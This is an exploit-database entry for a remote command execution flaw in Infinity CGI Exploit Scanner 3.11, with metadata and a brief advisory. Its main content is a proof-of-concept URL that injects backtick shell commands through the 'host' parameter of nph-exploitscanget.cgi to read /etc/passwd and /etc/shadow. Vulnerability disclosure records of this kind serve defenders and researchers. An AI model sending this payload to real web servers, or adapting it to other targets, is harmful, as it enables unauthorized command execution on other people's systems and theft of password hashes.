Infinity CGI Exploit Scanner 3.11 - Remote Command Execution
Author: badpack3t type: webapps platform: cgi port: date_added: 2003-06-12 date_updated: 2012-11-17 verified: 1 codes: OSVDB-54142 tags: aliases: screenshot_url: application_url: raw file: 22772.txt
source: https://www.securityfocus.com/bid/7913/info Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process. http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd`` cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0